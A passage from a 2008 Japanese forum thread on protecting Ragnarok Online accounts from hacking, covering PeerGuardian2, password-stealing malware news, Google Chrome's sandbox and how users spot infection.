それよりも厄介なのは、現在進行形で増えつつある、セキュリティプログラムの動作を妨害するマルウェアか。
hosts追記による防衛法が広まった為か、最近はhostsを削除したり、中身をクリアするような物もあるようだ。
同様に、PG2のプロセスをシャットダウンさせるような物が登場しないとも限らない。 <> （○口○*）さん<>sage<>08/09/01 01:07 ID:3mOsx1MA0<> >PG2そのものはオープンソースという形で公開されているのだから、

で、だれか後継の開発人はおるんか？
誰もやらなかったら、いくらオープンとはいえおしまいだぞ。 <> （○口○*）さん<>sage<>08/09/01 06:57 ID:CfS4fmjF0<> >970が反応ないのですが、わたしはスレ立てしたばっかりで立てられないので、>>981さんお願いします。

スレタイ：アカウントハック対策・セキュリティ総合スレ Lv.2

テンプレの変更箇所は>1の次スレについてがLiveROに移ったので依頼じゃないことと、リンク関係位かな

×>・スレ立て依頼は>>970がしてください。反応がなければ以降10ごとに。
○>・スレ立ては>>970がしてください。反応がなければ以降10ごとに。

－－－
【過去スレ】
アカウントハック総合対策スレ9
　http://gemma.mmobbs.com/test/read.cgi/ragnarok/1195956271/
セキュリティ対策、質問・雑談スレ5
　http://enif.mmobbs.com/test/read.cgi/livero/1205488101/
それ以前のログはROセキュリティWiki(http://rosafe.rowiki.jp/)へ
－－－
↓
－－－
【過去スレ】
アカウントハック対策・セキュリティ総合スレ
http://enif.mmobbs.com/test/read.cgi/livero/1213363112/

以前のログはROセキュリティWiki(http://rosafe.rowiki.jp/)へ
－－－

【備考】
・PeerGuardian2
　　http://sky.geocities.jp/vs_ro_hack/pg2.htm　にあるリネージュ資料室さんへのリンクが古いアドレスのようです。 <> （○口○*）さん<>sage<>08/09/01 07:10 ID:CgbKtnfu0<> 立てました

アカウントハック対策・セキュリティ総合スレ Lv.2
http://enif.mmobbs.com/test/read.cgi/livero/1220220582/

今から>>2以降埋めていきます <> （○口○*）さん<>sage<>08/09/01 09:54 ID:m8Rm+Ozb0<> sage入れ忘れたけれど、これ足しておきました。
>【PeerGuardian2 暫定ダウンロード先】 <> （○口○*）さん<>sage<>08/09/01 11:56 ID:2oK+gfyj0<> パスワードを盗むウイルスが急増、半数は「オンラインゲーム」を狙う
ttp://itpro.nikkeibp.co.jp/article/NEWS/20080829/313755/
ttp://vil.nai.com/images/blog290808b.jpg
2008年には30万種類近くに、仮想空間での詐欺行為や破壊行為にも注意 <> （○口○*）さん<>sage<>08/09/02 17:21 ID:nDt4ripe0<> 変形亜種入れたら平気で数が増えていくな <> （○口○*）さん<>sage<>08/09/02 18:35 ID:9nZHu6ib0<> 中国政府が取り締まらないとどうにもならなそうだな <> （○口○*）さん<>sage<>08/09/02 18:41 ID:WPUSUff30<> 今のところサイバーテロに政治が積極的に関わらないからなあ <> （○口○*）さん<><>08/09/02 19:50 ID:x9kcn0ub0<> 消化促進age <> （○口○*）さん<>sage<>08/09/03 02:32 ID:L5kRr8B40<> Google Chrome、かぁ。

http://journal.mycom.co.jp/news/2008/09/02/003/index.html
＞マルウェアの動作をタブ内部のサンドボックスで遮断でき、
＞ウィンドウのポップアップを防止したり、システム本体への
＞影響を与えないなど、安全なブラウジング環境を提供する。

どの程度がんばってくれるかはわからないけど
多様性が生まれてくれるのはいいことだね。 <> （○口○*）さん<>sage<>08/09/03 06:17 ID:MfAvfG0s0<> WebKitベースか。
windows版Safariがさっぱりな現状、まともに使い物になるKHTML系エンジンのブラウザとして仕上がってくれると良いが。 <> （○口○*）さん<>sage<>08/09/03 08:13 ID:nc1LORQZ0<> Safariは別に極端に悪くないと思うが、それをWindows用にリリースする
Appleの姿勢がイマイチかと。
そういう意味では、あれよりはマシになるでしょう。

しかしIEとFirefoxがあるのに、Chromeに移る理由がないな。 <> （○口○*）さん<>sage<>08/09/04 02:34 ID:n1I44W0x0<> 俺はChrome結構気に入った。速くて快適だし。
でもnProtectのせいでRO中は動作しないという凄いオチ発見orz <> （○口○*）さん<>sage<>08/09/04 02:50 ID:MzVW45qv0<> マジかｗ
軽いならwebラジオ聞きながらやろうと思ってたが、絶望的だな <> （○口○*）さん<>sage<>08/09/04 03:03 ID:oEo90Bro0<> ユーザー視点ではわざわざ移る理由はなさそうだけど、web制作サイドなら、Macユーザー向けの表示確認を
windowsベースである程度こなせるという意味で、導入する価値はあるかもしれない。
それと共に、IEでしかまともに閲覧することのできないページが減ってくれるなら無問題。 <> （○口○*）さん<>sage<>08/09/04 07:48 ID:2YwwjM5K0<> chromeを狙ったウィルスとか出てくんのかな <> （○口○*）さん<>sage<>08/09/04 07:50 ID:YlPBxoMy0<> ここ見落として次スレに書いてしまったので転載。

スマン質問なんだが、スキャンにも引っ掛からない場合でも垢ハックアドレス踏んだって報告見るけど、
何で踏んだってわかるんだ？何か表示されるの？

特に怪しいURL踏んだわけじゃないんだけど、昨日からPCがありえんぐらい読み込み遅くなったり
エラー出まくってウイルススキャン起動できなくなったりして、もしかして何か感染したのかと不安になったんで聞いてみた。
怖いからROはログインしなかった。 <> （○口○*）さん<>sage<>08/09/04 09:23 ID:ftmBEBaO0<> >>995
それより解決したのか？ <> （○口○*）さん<>sage<>08/09/04 09:24 ID:xxFT/iW/0<> 踏んだ事に気付く理由

・セキュリティソフトの反応
・予想外のページに飛ばされて気付く（ページ真っ白なども含む）
・サイト内のリンクの筈がサイト外に飛ばされた(PG2でブロックしたなど）
・ＰＣがなにか妙な挙動をはじめた

など、複数の可能性がある

>エラー出まくってウイルススキャン起動できなくなったりして
馬鹿者、とっとと対処せんか。

HDDの空き容量が足りなくなったとか、メモリが一部データエラー起こしてるとか、
CPUやGPUが(埃や他の要因で）過熱してるとか、不安定なソフトを入れたとかいろいろと
可能性はあるだろう。

だが、セキュリティソフトの起動障害は、不正ファイルを踏んだ可能性が高い。
特定のスキャンエンジンの障害の可能性もあるので、複数のセキュリティソフトの
オンラインスキャンを試みると、どれかがチェック可能かもしれん。 <> （○口○*）さん<>sage<>08/09/04 10:22 ID:xxFT/iW/0<> セキュリティソフトの更新期限が切れたので、F-Secure2008の体験版を入れてみた。

ROが重力エラー出すんですが・・・・・・・・・・・・・・他の奴試すか。orz <> （○口○*）さん<>sage<>08/09/04 10:23 ID:xxFT/iW/0<> 次スレ誘導

アカウントハック対策・セキュリティ総合スレ Lv.2
http://enif.mmobbs.com/test/read.cgi/livero/1220220582/ <> （○口○*）さん<>sage<>08/09/04 10:24 ID:gvpFbn5a0<> 初の1000！ <> １００１<><>Over 1000 Thread<> このスレッドは１０００を超えました。
もう書けないので、新しいスレッドを立ててくださいです。。。 <>